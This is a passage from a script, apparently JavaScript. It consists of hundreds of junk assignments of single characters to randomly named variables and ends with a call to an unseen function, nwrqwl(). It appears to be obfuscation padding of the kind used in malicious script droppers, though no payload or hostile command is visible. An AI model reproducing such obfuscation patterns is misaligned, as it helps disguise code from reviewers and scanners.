749 | qicugiylh = "h"; | |
750 | qicugiylh = "k"; | |
751 | qicugiylh = "M"; | |
752 | qicugiylh = "G"; | |
753 | qicugiylh = "W"; | |
754 | qicugiylh = "k"; | |
755 | qicugiylh = "l"; | |
756 | qicugiylh = "t"; | |
757 | qicugiylh = "K"; | |
758 | qicugiylh = "G"; | |
759 | qicugiylh = "O"; | |
760 | qicugiylh = "Z"; | |
761 | qicugiylh = "W"; | |
762 | qicugiylh = "o"; | |
763 | qicugiylh = "q"; | |
764 | qicugiylh = "S"; | |
765 | qicugiylh = "O"; | |
766 | qicugiylh = "y"; | |
767 | qicugiylh = "D"; | |
768 | qicugiylh = "u"; | |
769 | qicugiylh = "K"; | |
770 | qicugiylh = "f"; | |
771 | qicugiylh = "Z"; | |
772 | qicugiylh = "T"; | |
773 | qicugiylh = "o"; | |
774 | qicugiylh = "y"; | |
775 | qicugiylh = "n"; | |
776 | hyasyvulb = "M"; | |
777 | hyasyvulb = "C"; | |
778 | hyasyvulb = "M"; | |
779 | hyasyvulb = "w"; | |
780 | hyasyvulb = "D"; | |
781 | hyasyvulb = "T"; | |
782 | hyasyvulb = "S"; | |
783 | hyasyvulb = "f"; | |
784 | hyasyvulb = "z"; | |
785 | hyasyvulb = "L"; | |
786 | hyasyvulb = "T"; | |
787 | hyasyvulb = "y"; | |
788 | hyasyvulb = "X"; | |
789 | hyasyvulb = "z"; | |
790 | hyasyvulb = "E"; | |
791 | hyasyvulb = "t"; | |
792 | hyasyvulb = "U"; | |
793 | hyasyvulb = "P"; | |
794 | hyasyvulb = "Z"; | |
795 | hyasyvulb = "o"; | |
796 | hyasyvulb = "n"; | |
797 | hyasyvulb = "S"; | |
798 | hyasyvulb = "S"; | |
799 | hyasyvulb = "i"; | |
800 | hyasyvulb = "M"; | |
801 | hyasyvulb = "I"; | |
802 | hyasyvulb = "R"; | |
803 | hyasyvulb = "M"; | |
804 | hyasyvulb = "g"; | |
805 | hyasyvulb = "U"; | |
806 | hyasyvulb = "Y"; | |
807 | hyasyvulb = "s"; | |
808 | hyasyvulb = "h"; | |
809 | hyasyvulb = "r"; | |
810 | hyasyvulb = "Z"; | |
811 | hyasyvulb = "V"; | |
812 | hyasyvulb = "/"; | |
813 | iwdwmpls = "A"; | |
814 | iwdwmpls = "O"; | |
815 | iwdwmpls = "X"; | |
816 | iwdwmpls = "T"; | |
817 | iwdwmpls = "I"; | |
818 | iwdwmpls = "q"; | |
819 | iwdwmpls = "S"; | |
820 | iwdwmpls = "T"; | |
821 | iwdwmpls = "S"; | |
822 | iwdwmpls = "l"; | |
823 | iwdwmpls = "g"; | |
824 | iwdwmpls = "G"; | |
825 | iwdwmpls = "K"; | |
826 | iwdwmpls = "f"; | |
827 | iwdwmpls = "m"; | |
828 | iwdwmpls = "e"; | |
829 | iwdwmpls = "c"; | |
830 | iwdwmpls = "c"; | |
831 | iwdwmpls = "p"; | |
832 | iwdwmpls = "r"; | |
833 | iwdwmpls = "O"; | |
834 | iwdwmpls = "c"; | |
835 | iwdwmpls = "Q"; | |
836 | iwdwmpls = "l"; | |
837 | iwdwmpls = "S"; | |
838 | iwdwmpls = "F"; | |
839 | iwdwmpls = "M"; | |
840 | iwdwmpls = "F"; | |
841 | iwdwmpls = "l"; | |
842 | iwdwmpls = "m"; | |
843 | xadsud = "d"; | |
844 | xadsud = "A"; | |
845 | xadsud = "z"; | |
846 | xadsud = "V"; | |
847 | xadsud = "Q"; | |
848 | xadsud = "x"; | |
849 | xadsud = "F"; | |
850 | xadsud = "a"; | |
851 | xadsud = "f"; | |
852 | xadsud = "O"; | |
853 | xadsud = "w"; | |
854 | xadsud = "i"; | |
855 | xadsud = "X"; | |
856 | xadsud = "B"; | |
857 | xadsud = "m"; | |
858 | xadsud = "R"; | |
859 | xadsud = "k"; | |
860 | xadsud = "O"; | |
861 | xadsud = "g"; | |
862 | xadsud = "F"; | |
863 | xadsud = "R"; | |
864 | xadsud = "O"; | |
865 | xadsud = "E"; | |
866 | xadsud = "O"; | |
867 | xadsud = "z"; | |
868 | xadsud = "I"; | |
869 | xadsud = "A"; | |
870 | xadsud = "u"; | |
871 | xadsud = "x"; | |
872 | xadsud = "O"; | |
873 | xadsud = "W"; | |
874 | xadsud = "n"; | |
875 | xadsud = "C"; | |
876 | xadsud = "x"; | |
877 | xadsud = "y"; | |
878 | xadsud = "e"; | |
879 | xadsud = "a"; | |
880 | xadsud = "n"; | |
881 | xadsud = "I"; | |
882 | xadsud = "x"; | |
883 | xadsud = "b"; | |
884 | xadsud = "v"; | |
885 | xadsud = "c"; | |
886 | xadsud = " "; | |
887 | hqadxq = "x"; | |
888 | hqadxq = "C"; | |
889 | hqadxq = "F"; | |
890 | hqadxq = "D"; | |
891 | hqadxq = "w"; | |
892 | hurfqpq = "K"; | |
893 | hurfqpq = "l"; | |
894 | hurfqpq = "n"; | |
895 | hurfqpq = "r"; | |
896 | hurfqpq = "a"; | |
897 | hurfqpq = "b"; | |
898 | hurfqpq = "T"; | |
899 | hurfqpq = "M"; | |
900 | hurfqpq = "O"; | |
901 | hurfqpq = "F"; | |
902 | hurfqpq = "q"; | |
903 | hurfqpq = "M"; | |
904 | hurfqpq = "l"; | |
905 | hurfqpq = "I"; | |
906 | hurfqpq = "g"; | |
907 | hurfqpq = "n"; | |
908 | hurfqpq = "Y"; | |
909 | hurfqpq = "S"; | |
910 | hurfqpq = "o"; | |
911 | hurfqpq = "g"; | |
912 | hurfqpq = "a"; | |
913 | hurfqpq = "t"; | |
914 | hurfqpq = "d"; | |
915 | hurfqpq = "P"; | |
916 | hurfqpq = "C"; | |
917 | hurfqpq = "u"; | |
918 | hurfqpq = "U"; | |
919 | hurfqpq = "X"; | |
920 | hurfqpq = "l"; | |
921 | hurfqpq = "H"; | |
922 | hurfqpq = "n"; | |
923 | hurfqpq = "L"; | |
924 | hurfqpq = "8"; | |
925 | rvept = "w"; | |
926 | rvept = "V"; | |
927 | rvept = "K"; | |
928 | rvept = "f"; | |
929 | rvept = "q"; | |
930 | rvept = "H"; | |
931 | rvept = "L"; | |
932 | rvept = "G"; | |
933 | rvept = "Q"; | |
934 | rvept = "o"; | |
935 | rvept = "f"; | |
936 | rvept = "K"; | |
937 | rvept = "K"; | |
938 | rvept = "V"; | |
939 | rvept = "W"; | |
940 | rvept = "v"; | |
941 | rvept = "c"; | |
942 | rvept = "o"; | |
943 | rvept = "P"; | |
944 | rvept = "l"; | |
945 | rvept = "o"; | |
946 | rvept = "r"; | |
947 | rvept = "l"; | |
948 | rvept = "d"; | |
949 | rvept = "T"; | |
950 | rvept = "S"; | |
951 | rvept = "f"; | |
952 | rvept = "j"; | |
953 | rvept = "o"; | |
954 | jfmgar = "Y"; | |
955 | jfmgar = "C"; | |
956 | jfmgar = "M"; | |
957 | jfmgar = "R"; | |
958 | thnna = "M"; | |
959 | thnna = "O"; | |
960 | thnna = "Y"; | |
961 | thnna = "Y"; | |
962 | thnna = "E"; | |
963 | thnna = "x"; | |
964 | thnna = "Y"; | |
965 | thnna = "x"; | |
966 | thnna = "N"; | |
967 | thnna = "q"; | |
968 | thnna = "l"; | |
969 | thnna = "D"; | |
970 | thnna = "L"; | |
971 | thnna = "w"; | |
972 | thnna = "f"; | |
973 | thnna = "U"; | |
974 | thnna = "P"; | |
975 | thnna = "Y"; | |
976 | thnna = "S"; | |
977 | thnna = "e"; | |
978 | thnna = "D"; | |
979 | thnna = "N"; | |
980 | thnna = "q"; | |
981 | thnna = "A"; | |
982 | thnna = "a"; | |
983 | thnna = "l"; | |
984 | thnna = "s"; | |
985 | thnna = "F"; | |
986 | thnna = "R"; | |
987 | thnna = "x"; | |
988 | thnna = "w"; | |
989 | thnna = "Q"; | |
990 | thnna = "u"; | |
991 | thnna = "B"; | |
992 | thnna = "j"; | |
993 | thnna = "X"; | |
994 | thnna = "P"; | |
995 | sfslgmme = "b"; | |
996 | sfslgmme = "t"; | |
997 | sfslgmme = "r"; | |
998 | sfslgmme = "o"; | |
999 | sfslgmme = "o"; | |
1000 | sfslgmme = "m"; | |
1001 | sfslgmme = "O"; | |
1002 | sfslgmme = "q"; | |
1003 | sfslgmme = "q"; | |
1004 | sfslgmme = "e"; | |
1005 | sfslgmme = "c"; | |
1006 | sfslgmme = "B"; | |
1007 | sfslgmme = "v"; | |
1008 | sfslgmme = "J"; | |
1009 | sfslgmme = "s"; | |
1010 | sfslgmme = "U"; | |
1011 | sfslgmme = "W"; | |
1012 | sfslgmme = "K"; | |
1013 | ngbsdf = "t"; | |
1014 | ngbsdf = "g"; | |
1015 | ngbsdf = "n"; | |
1016 | ngbsdf = "o"; | |
1017 | ngbsdf = "s"; | |
1018 | ngbsdf = "s"; | |
1019 | ngbsdf = "F"; | |
1020 | ngbsdf = "N"; | |
1021 | ngbsdf = "Y"; | |
1022 | ngbsdf = "B"; | |
1023 | ngbsdf = "H"; | |
1024 | ngbsdf = "K"; | |
1025 | ngbsdf = "U"; | |
1026 | ngbsdf = "H"; | |
1027 | uzdhf = "H"; | |
1028 | uzdhf = "c"; | |
1029 | uzdhf = "P"; | |
1030 | uzdhf = "U"; | |
1031 | uzdhf = "r"; | |
1032 | uzdhf = "g"; | |
1033 | uzdhf = "E"; | |
1034 | uzdhf = "O"; | |
1035 | uzdhf = "l"; | |
1036 | uzdhf = "u"; | |
1037 | uzdhf = "K"; | |
1038 | uzdhf = "i"; | |
1039 | uzdhf = "v"; | |
1040 | uzdhf = "E"; | |
1041 | uzdhf = "W"; | |
1042 | uzdhf = "q"; | |
1043 | uzdhf = "a"; | |
1044 | uzdhf = "R"; | |
1045 | uzdhf = "K"; | |
1046 | uzdhf = "U"; | |
1047 | uzdhf = "L"; | |
1048 | uzdhf = "j"; | |
1049 | uzdhf = "E"; | |
1050 | uzdhf = "q"; | |
1051 | uzdhf = "g"; | |
1052 | uzdhf = "I"; | |
1053 | nuazojiz = "g"; | |
1054 | nuazojiz = "G"; | |
1055 | nuazojiz = "X"; | |
1056 | nuazojiz = "e"; | |
1057 | nuazojiz = "d"; | |
1058 | nuazojiz = "A"; | |
1059 | nuazojiz = "C"; | |
1060 | nuazojiz = "B"; | |
1061 | nuazojiz = "e"; | |
1062 | nuazojiz = "H"; | |
1063 | nuazojiz = "U"; | |
1064 | nuazojiz = "h"; | |
1065 | nuazojiz = "R"; | |
1066 | nuazojiz = "j"; | |
1067 | nuazojiz = "Q"; | |
1068 | nuazojiz = "u"; | |
1069 | nuazojiz = "B"; | |
1070 | nuazojiz = "Q"; | |
1071 | nuazojiz = "b"; | |
1072 | nuazojiz = "T"; | |
1073 | nuazojiz = "K"; | |
1074 | nuazojiz = "g"; | |
1075 | nuazojiz = "q"; | |
1076 | nuazojiz = "o"; | |
1077 | nuazojiz = "R"; | |
1078 | nuazojiz = "K"; | |
1079 | nuazojiz = "h"; | |
1080 | nuazojiz = "D"; | |
1081 | nuazojiz = "o"; | |
1082 | nuazojiz = "n"; | |
1083 | nuazojiz = "c"; | |
1084 | nuazojiz = "b"; | |
1085 | nuazojiz = "f"; | |
1086 | nuazojiz = "p"; | |
1087 | nuazojiz = "H"; | |
1088 | nuazojiz = "w"; | |
1089 | nuazojiz = "s"; | |
1090 | nuazojiz = "h"; | |
1091 | nuazojiz = "O"; | |
1092 | nuazojiz = "e"; | |
1093 | nuazojiz = "p"; | |
1094 | nuazojiz = "Z"; | |
1095 | nuazojiz = "R"; | |
1096 | nuazojiz = "M"; | |
1097 | nuazojiz = "j"; | |
1098 | gyaotq = "t"; | |
1099 | gyaotq = "q"; | |
1100 | gyaotq = "G"; | |
1101 | gyaotq = "P"; | |
1102 | gyaotq = "q"; | |
1103 | gyaotq = "Q"; | |
1104 | gyaotq = "r"; | |
1105 | gyaotq = "C"; | |
1106 | gyaotq = "t"; | |
1107 | gyaotq = "b"; | |
1108 | gyaotq = "c"; | |
1109 | gyaotq = "i"; | |
1110 | gyaotq = "A"; | |
1111 | gyaotq = "T"; | |
1112 | gyaotq = "W"; | |
1113 | gyaotq = "T"; | |
1114 | gyaotq = "W"; | |
1115 | gyaotq = "B"; | |
1116 | gyaotq = "L"; | |
1117 | gyaotq = "P"; | |
1118 | gyaotq = "J"; | |
1119 | gyaotq = "o"; | |
1120 | gyaotq = "b"; | |
1121 | gyaotq = "B"; | |
1122 | gyaotq = "f"; | |
1123 | gyaotq = "y"; | |
1124 | gyaotq = "w"; | |
1125 | gyaotq = "g"; | |
1126 | gyaotq = "M"; | |
1127 | gyaotq = "d"; | |
1128 | wybiw = "m"; | |
1129 | wybiw = "a"; | |
1130 | wybiw = "K"; | |
1131 | wybiw = "b"; | |
1132 | wybiw = "K"; | |
1133 | wybiw = "L"; | |
1134 | wybiw = "x"; | |
1135 | wybiw = "Y"; | |
1136 | wybiw = "S"; | |
1137 | wybiw = "U"; | |
1138 | wybiw = "m"; | |
1139 | wybiw = "Q"; | |
1140 | wybiw = "K"; | |
1141 | wybiw = "m"; | |
1142 | wybiw = "t"; | |
1143 | wybiw = "D"; | |
1144 | wybiw = "w"; | |
1145 | wybiw = "V"; | |
1146 | wybiw = "T"; | |
1147 | wybiw = "j"; | |
1148 | wybiw = "D"; | |
1149 | wybiw = "t"; | |
1150 | wybiw = "D"; | |
1151 | wybiw = "b"; | |
1152 | wybiw = "c"; | |
1153 | wybiw = "l"; | |
1154 | wybiw = "V"; | |
1155 | wybiw = "B"; | |
1156 | wybiw = "i"; | |
1157 | wybiw = "W"; | |
1158 | wybiw = "J"; | |
1159 | wybiw = "H"; | |
1160 | wybiw = "H"; | |
1161 | wybiw = "1"; | |
1162 | psdndri = "b"; | |
1163 | psdndri = "N"; | |
1164 | psdndri = "e"; | |
1165 | psdndri = "I"; | |
1166 | psdndri = "B"; | |
1167 | psdndri = "F"; | |
1168 | psdndri = "i"; | |
1169 | psdndri = "k"; | |
1170 | psdndri = "l"; | |
1171 | psdndri = "Y"; | |
1172 | psdndri = "R"; | |
1173 | psdndri = "K"; | |
1174 | psdndri = "L"; | |
1175 | psdndri = "o"; | |
1176 | psdndri = "j"; | |
1177 | psdndri = "w"; | |
1178 | psdndri = "z"; | |
1179 | psdndri = "t"; | |
1180 | psdndri = "l"; | |
1181 | psdndri = "E"; | |
1182 | psdndri = "A"; | |
1183 | psdndri = "c"; | |
1184 | psdndri = "x"; | |
1185 | psdndri = "d"; | |
1186 | psdndri = "u"; | |
1187 | psdndri = "x"; | |
1188 | psdndri = "f"; | |
1189 | psdndri = "R"; | |
1190 | psdndri = "B"; | |
1191 | psdndri = "j"; | |
1192 | psdndri = "T"; | |
1193 | psdndri = "d"; | |
1194 | psdndri = "d"; | |
1195 | psdndri = "e"; | |
1196 | psdndri = "e"; | |
1197 | psdndri = "X"; | |
1198 | psdndri = "E"; | |
1199 | psdndri = "D"; | |
1200 | psdndri = "z"; | |
1201 | psdndri = "T"; | |
1202 | psdndri = "p"; | |
1203 | psdndri = "t"; | |
1204 | psdndri = "g"; | |
1205 | tylhprysl = "p"; | |
1206 | tylhprysl = "s"; | |
1207 | tylhprysl = "x"; | |
1208 | tylhprysl = "M"; | |
1209 | tylhprysl = "e"; | |
1210 | tylhprysl = "f"; | |
1211 | tylhprysl = "g"; | |
1212 | tylhprysl = "M"; | |
1213 | tylhprysl = "E"; | |
1214 | tylhprysl = "c"; | |
1215 | tylhprysl = "c"; | |
1216 | tylhprysl = "X"; | |
1217 | tylhprysl = "X"; | |
1218 | tylhprysl = "e"; | |
1219 | tylhprysl = "P"; | |
1220 | tylhprysl = "C"; | |
1221 | tylhprysl = "n"; | |
1222 | tylhprysl = "C"; | |
1223 | tylhprysl = "q"; | |
1224 | tylhprysl = "d"; | |
1225 | tylhprysl = "N"; | |
1226 | tylhprysl = "L"; | |
1227 | tylhprysl = "C"; | |
1228 | tylhprysl = "Q"; | |
1229 | tylhprysl = "a"; | |
1230 | tylhprysl = "Y"; | |
1231 | tylhprysl = "k"; | |
1232 | tylhprysl = "M"; | |
1233 | tylhprysl = "B"; | |
1234 | tylhprysl = "V"; | |
1235 | tylhprysl = "f"; | |
1236 | tylhprysl = "g"; | |
1237 | tylhprysl = "K"; | |
1238 | tylhprysl = "y"; | |
1239 | tylhprysl = "x"; | |
1240 | tylhprysl = "E"; | |
1241 | tylhprysl = "h"; | |
1242 | tylhprysl = "G"; | |
1243 | tylhprysl = "O"; | |
1244 | izmkfyoq = "T"; | |
1245 | izmkfyoq = "r"; | |
1246 | izmkfyoq = "n"; | |
1247 | izmkfyoq = "c"; | |
1248 | izmkfyoq = "m"; | |
1249 | izmkfyoq = "w"; | |
1250 | izmkfyoq = "w"; | |
1251 | izmkfyoq = "j"; | |
1252 | izmkfyoq = "U"; | |
1253 | izmkfyoq = "w"; | |
1254 | izmkfyoq = "w"; | |
1255 | izmkfyoq = "f"; | |
1256 | ssgqqb = "U"; | |
1257 | ssgqqb = "A"; | |
1258 | ssgqqb = "J"; | |
1259 | ssgqqb = "y"; | |
1260 | ssgqqb = "m"; | |
1261 | ssgqqb = "g"; | |
1262 | ssgqqb = "V"; | |
1263 | ssgqqb = "V"; | |
1264 | ssgqqb = "n"; | |
1265 | ssgqqb = "K"; | |
1266 | ssgqqb = "m"; | |
1267 | ssgqqb = "P"; | |
1268 | ssgqqb = "y"; | |
1269 | ssgqqb = "k"; | |
1270 | ssgqqb = "X"; | |
1271 | ssgqqb = "F"; | |
1272 | ssgqqb = "D"; | |
1273 | ssgqqb = "j"; | |
1274 | ssgqqb = "f"; | |
1275 | ssgqqb = "v"; | |
1276 | ssgqqb = "Y"; | |
1277 | ssgqqb = "i"; | |
1278 | ssgqqb = "d"; | |
1279 | ssgqqb = "P"; | |
1280 | ssgqqb = "L"; | |
1281 | ssgqqb = "L"; | |
1282 | ssgqqb = "d"; | |
1283 | ssgqqb = "W"; | |
1284 | pynxfd = "I"; | |
1285 | pynxfd = "d"; | |
1286 | pynxfd = "H"; | |
1287 | pynxfd = "R"; | |
1288 | pynxfd = "e"; | |
1289 | pynxfd = "y"; | |
1290 | pynxfd = "Q"; | |
1291 | pynxfd = "w"; | |
1292 | pynxfd = "E"; | |
1293 | pynxfd = "j"; | |
1294 | pynxfd = "f"; | |
1295 | pynxfd = "h"; | |
1296 | pynxfd = "j"; | |
1297 | pynxfd = "A"; | |
1298 | pynxfd = "t"; | |
1299 | pynxfd = "X"; | |
1300 | pynxfd = "h"; | |
1301 | pynxfd = "x"; | |
1302 | pynxfd = "c"; | |
1303 | pynxfd = "E"; | |
1304 | pynxfd = "I"; | |
1305 | pynxfd = "h"; | |
1306 | pynxfd = "Y"; | |
1307 | pynxfd = "n"; | |
1308 | pynxfd = "L"; | |
1309 | pynxfd = "S"; | |
1310 | pynxfd = "e"; | |
1311 | pynxfd = "i"; | |
1312 | pynxfd = "G"; | |
1313 | pynxfd = "l"; | |
1314 | pynxfd = "z"; | |
1315 | pynxfd = "y"; | |
1316 | pynxfd = "P"; | |
1317 | pynxfd = "K"; | |
1318 | pynxfd = "r"; | |
1319 | pynxfd = "3"; | |
1320 | ricwos = "W"; | |
1321 | ricwos = "M"; | |
1322 | ricwos = "p"; | |
1323 | ricwos = "B"; | |
1324 | ricwos = "T"; | |
1325 | ricwos = "r"; | |
1326 | ricwos = "d"; | |
1327 | ricwos = "d"; | |
1328 | ricwos = "w"; | |
1329 | ricwos = "x"; | |
1330 | ricwos = "f"; | |
1331 | ricwos = "t"; | |
1332 | ricwos = "K"; | |
1333 | ricwos = "O"; | |
1334 | ricwos = "S"; | |
1335 | ricwos = "D"; | |
1336 | ricwos = "b"; | |
1337 | ricwos = "w"; | |
1338 | ricwos = "E"; | |
1339 | ricwos = "k"; | |
1340 | ricwos = "W"; | |
1341 | ricwos = "H"; | |
1342 | ricwos = "t"; | |
1343 | ricwos = "T"; | |
1344 | ricwos = "C"; | |
1345 | ricwos = "v"; | |
1346 | ricwos = "u"; | |
1347 | wjeoybgu = "Z"; | |
1348 | wjeoybgu = "H"; | |
1349 | wjeoybgu = "Q"; | |
1350 | wjeoybgu = "C"; | |
1351 | wjeoybgu = "S"; | |
1352 | wjeoybgu = "g"; | |
1353 | wjeoybgu = "t"; | |
1354 | wjeoybgu = "B"; | |
1355 | wjeoybgu = "j"; | |
1356 | wjeoybgu = "Z"; | |
1357 | wjeoybgu = "e"; | |
1358 | wjeoybgu = "r"; | |
1359 | wjeoybgu = "w"; | |
1360 | wjeoybgu = "G"; | |
1361 | wjeoybgu = "S"; | |
1362 | nwrqwl ( ); |
|